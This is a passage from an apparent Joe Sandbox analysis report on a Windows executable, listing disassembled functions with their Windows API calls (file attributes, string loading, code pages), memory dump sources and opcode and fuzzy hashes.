                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$LoadStringText$DialogDispatchItemPeekTranslateWindowswprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1010759681-0
                                                                                                            • Opcode ID: 41d15c9fbbc784fc66378d85622167e862d31721dc50d3c42cd6f485a28599ae
                                                                                                            • Instruction ID: 32cf80f920e6fb1acf5940515d377790b3db0389bb8c2adab65d7f77a9179054
                                                                                                            • Opcode Fuzzy Hash: 41d15c9fbbc784fc66378d85622167e862d31721dc50d3c42cd6f485a28599ae
                                                                                                            • Instruction Fuzzy Hash: 3EF0C86291C68371FA207F60F8513F992B1AF49788FC40035F99D47392DD2CD241A621
                                                                                                            Function 00007FF7390E3030 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: cebc4a56e9a54c3c143052a963639bf107cf1e8dac032d8b1b4e473ee6584d8c
                                                                                                            • Instruction ID: 1cb142756c08f13345e7e30f79f2ced5d6e44cdeda06cff3f9229203b7282477
                                                                                                            • Opcode Fuzzy Hash: cebc4a56e9a54c3c143052a963639bf107cf1e8dac032d8b1b4e473ee6584d8c
                                                                                                            • Instruction Fuzzy Hash: EFE01A30F04B0F92EB44BF35A89527963736F88B41F446838C80A02796CE3DE848A221
                                                                                                            Function 00007FF7390E74AC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Info
                                                                                                            • String ID:
                                                                                                            • API String ID: 1807457897-3916222277
                                                                                                            • Opcode ID: a2ab0296577d90eab08ff6961b23e1cd1b19fa53aab6bc0b2d64e4c8e20b37dc
                                                                                                            • Instruction ID: 0e91c314e2f107357035b5fee47c20311ad0e5350f0016e3e663eff697099c34
                                                                                                            • Opcode Fuzzy Hash: a2ab0296577d90eab08ff6961b23e1cd1b19fa53aab6bc0b2d64e4c8e20b37dc
                                                                                                            • Instruction Fuzzy Hash: C451B373A1C6C6AAE7219F2CE0443ADBBB1F748748F940136D68D87A55CB7CD145DB10
                                                                                                            Function 00007FF7390E68BC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String
                                                                                                            • String ID: LCMapStringEx
                                                                                                            • API String ID: 2568140703-3893581201
                                                                                                            • Opcode ID: ccc6a95e521b44420893b0bbc1ce3509cc5244f128a5fde2fc1e843eb3bf8902
                                                                                                            • Instruction ID: 5d032d91a16133281622ed6e2654ec594bf8034538b3d0bf03aee3e3ef20dcec
                                                                                                            • Opcode Fuzzy Hash: ccc6a95e521b44420893b0bbc1ce3509cc5244f128a5fde2fc1e843eb3bf8902
                                                                                                            • Instruction Fuzzy Hash: E8213936A09B8692DB24DF56B4402AAB7A5FBC8F90F44413AEE8D43B18DF3CD5459B00
                                                                                                            Function 00007FF7390E6844 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000003,00007FF7390E59E1), ref: 00007FF7390E68A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                                            • API String ID: 2593887523-3084827643
                                                                                                            • Opcode ID: 4b36f3306fb8a50d2b70fa4c218aca5f62622819d7c1773298a4475074efc73e
                                                                                                            • Instruction ID: bf84d5364e39e2c4d8a94440cef7b0fda04cbd5c40a0eb75a2ed66c60144fc52
                                                                                                            • Opcode Fuzzy Hash: 4b36f3306fb8a50d2b70fa4c218aca5f62622819d7c1773298a4475074efc73e
                                                                                                            • Instruction Fuzzy Hash: 4BF08165F09F4AA2EA04BF52B180079B772AB88FD0F844536DE4E03B18DE3CD5419710
                                                                                                            Function 00007FF7390E66D4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Alloc
                                                                                                            • String ID: FlsAlloc
                                                                                                            • API String ID: 2773662609-671089009
                                                                                                            • Opcode ID: 087ad5ec1f70d1ca66680f17c5221e0fe20c07047179eecce366436ab7ec1925
                                                                                                            • Instruction ID: 87ab1f63b6de16c7c71580fcb0bafc4451d04f73ff927c3ae74e2216f2aa99e6
                                                                                                            • Opcode Fuzzy Hash: 087ad5ec1f70d1ca66680f17c5221e0fe20c07047179eecce366436ab7ec1925
                                                                                                            • Instruction Fuzzy Hash: E2E03021E0BA4BB1EE05BF61B4581B89272AF48BD4FC40032D94E47755EE3CD585E764
                                                                                                            Function 00007FF7390E7938 Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7390E739C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF7390E76B9,?,?,?,?,?,?,?,00007FF7390E7869), ref: 00007FF7390E73C6
                                                                                                            • IsValidCodePage.KERNEL32(?,?,?,00000000,?,00000000,00000001,00007FF7390E776C,?,?,?,?,?,?,?,00007FF7390E7869), ref: 00007FF7390E79B2
                                                                                                            • GetCPInfo.KERNEL32(?,?,?,00000000,?,00000000,00000001,00007FF7390E776C,?,?,?,?,?,?,?,00007FF7390E7869), ref: 00007FF7390E79C7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CodeInfoPageValid
                                                                                                            • String ID:
                                                                                                            • API String ID: 546120528-0
                                                                                                            • Opcode ID: 23c523cea362783629642b46c0c719700607a77ed36913aace6f7e0d5d51bdbf
                                                                                                            • Instruction ID: fc5805b6eaf4f09db794a379565a3d0ff67fefa1906d5e4c68a0bc0c23d9d5ec
                                                                                                            • Opcode Fuzzy Hash: 23c523cea362783629642b46c0c719700607a77ed36913aace6f7e0d5d51bdbf
                                                                                                            • Instruction Fuzzy Hash: 3F81B462E0CA8771F764AF289844278F7B3FB84B94FD84131DA4D46694DE3CEA41E360
                                                                                                            Function 00007FF7390C25E8 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2976181284-0
                                                                                                            • Opcode ID: 70d3618d75e320ed4a1f73b4cc8fd397ce23708628bd50f88bf72d9d1ff381b8
                                                                                                            • Instruction ID: 8842f2866935c33dd3b648fbe83632487df98baecc61129a0cd1fa16a0d76b3d
                                                                                                            • Opcode Fuzzy Hash: 70d3618d75e320ed4a1f73b4cc8fd397ce23708628bd50f88bf72d9d1ff381b8
                                                                                                            • Instruction Fuzzy Hash: F231D832B19947A2FA606F2DD540679A272AF04FD4F940131FE9D4BBB0DE2DD481BA30
                                                                                                            Function 00007FF7390C2138 Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: d43b1e29ab31128e26cd6a21622dab8a33894e68f4ecd2d57683f31805451008
                                                                                                            • Instruction ID: 7a28efb32cc381f097d65863cbfa1dd3ed15ce705c64ab37022ee1d05839d87c
                                                                                                            • Opcode Fuzzy Hash: d43b1e29ab31128e26cd6a21622dab8a33894e68f4ecd2d57683f31805451008
                                                                                                            • Instruction Fuzzy Hash: CD310873A1874396EB70AF24E4043A8A6B1BB54778F804334DFAC0AAD5DF7CD455AB50
                                                                                                            Function 00007FF7390C2930 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$BuffersFlushTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 1392018926-0
                                                                                                            • Opcode ID: 3c565a1a1030715457d762e065f974c285b5cbd9a24273f0889803e53f1bca5a
                                                                                                            • Instruction ID: acaf7295bcee7c22284103509e415ab20daaa08168695c3512f8bf2d722d5ece
                                                                                                            • Opcode Fuzzy Hash: 3c565a1a1030715457d762e065f974c285b5cbd9a24273f0889803e53f1bca5a
                                                                                                            • Instruction Fuzzy Hash: 9721E562E09747A1FB61AE55D40037A97E2EF01794F944031DECC0A6A5EE3CD486DA10
                                                                                                            Function 00007FF7390C6118 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString
                                                                                                            • String ID:
                                                                                                            • API String ID: 2948472770-0
                                                                                                            • Opcode ID: e6cc57008c55985f415ed924a97a09d3e03cc914fcebae2233bc98605e233276
                                                                                                            • Instruction ID: 59daf8247ca0a13f5e3b8886101ef17ce7c27ae858257689d3ef45471528b9b0
                                                                                                            • Opcode Fuzzy Hash: e6cc57008c55985f415ed924a97a09d3e03cc914fcebae2233bc98605e233276
                                                                                                            • Instruction Fuzzy Hash: A11190B0B08B4295E750AF06B884169F7B2BB88FC0BE84035EE4C97326DF7CE5019754
                                                                                                            Function 00007FF7390C2A10 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2976181284-0
                                                                                                            • Opcode ID: 64a9290797105c02b0ccf20e1238879dc32e8dee9d3b54dc159208db3474318d
                                                                                                            • Instruction ID: f0d9301726598c31cb5905b03254d54de0784ff9464bbdbb5841280b2c134963
                                                                                                            • Opcode Fuzzy Hash: 64a9290797105c02b0ccf20e1238879dc32e8dee9d3b54dc159208db3474318d
                                                                                                            • Instruction Fuzzy Hash: A011D821A08643A6E760AF29E440279A372EB44B74FD44331DABD166E4CF3CD482DB10
                                                                                                            Function 00007FF7390C1230 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemRectTextWindow$Clientswprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3322643685-0
                                                                                                            • Opcode ID: b125b967a03e8941689ddab8695ffb79a431a4240593221ed613d7c3783d26ce
                                                                                                            • Instruction ID: b66d2b8f6576db28ada914a98e19d7b5701c136e507a8ff27ad0582490c0a73f
                                                                                                            • Opcode Fuzzy Hash: b125b967a03e8941689ddab8695ffb79a431a4240593221ed613d7c3783d26ce
                                                                                                            • Instruction Fuzzy Hash: A6019224E0CA4B62FF557F92E5442B6D3B26F45744F884034C88E4A3D5DE6CE455EB60
                                                                                                            Function 00007FF7390C3630 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetFileAttributesW.KERNELBASE(?,00007FF7390C341E,?,00007FF7390C2FD7), ref: 00007FF7390C365F
                                                                                                            • SetFileAttributesW.KERNEL32(?,00007FF7390C341E,?,00007FF7390C2FD7), ref: 00007FF7390C368C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 9ac7e175c0942fe284a68d5b65266f3a3ce0d3d2487ddc929247c28465f532d2
                                                                                                            • Instruction ID: 2e8eef45927064541d2be3fed7ee50bdc685793e0834b59c61f86b21fb878834
                                                                                                            • Opcode Fuzzy Hash: 9ac7e175c0942fe284a68d5b65266f3a3ce0d3d2487ddc929247c28465f532d2
                                                                                                            • Instruction Fuzzy Hash: 13017132B19B8261F620AF21A444299A3B9BB88BC0FD44131EDCC87758DE3CDA42DB10
                                                                                                            Function 00007FF7390C309C Relevance: 3.0, APIs: 2, Instructions: 32fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 4033686569-0
                                                                                                            • Opcode ID: fb9b87eef724f5280d9c66c8a960b1d881a397dafe3be406edda2d5b6c3767c8
                                                                                                            • Instruction ID: 3be9eb95d38e0acfc34acdaf9176b15bc313243afc1e257ed5223925a115211f
                                                                                                            • Opcode Fuzzy Hash: fb9b87eef724f5280d9c66c8a960b1d881a397dafe3be406edda2d5b6c3767c8
                                                                                                            • Instruction Fuzzy Hash: CCF0A422B196C361F620AF25E4513A9A3B5BF887C4FC44031E9CD47659DF2CD6959A10
                                                                                                            Function 00007FF7390C3134 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(?,00007FF7390C33E2,00000001,00000001,?,00007FF7390C2FD7), ref: 00007FF7390C315C
                                                                                                            • GetFileAttributesW.KERNEL32(?,00007FF7390C33E2,00000001,00000001,?,00007FF7390C2FD7), ref: 00007FF7390C3185
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 69778bcd8d88ff80b7e8675e7032625dbd32ff16c37f4ca61923bae535d7551d
                                                                                                            • Instruction ID: 9d7fbae6f9e2b0a2ae25fa22ec427f116263b206860fb64ebe9ba7b9abf5a5d9
                                                                                                            • Opcode Fuzzy Hash: 69778bcd8d88ff80b7e8675e7032625dbd32ff16c37f4ca61923bae535d7551d
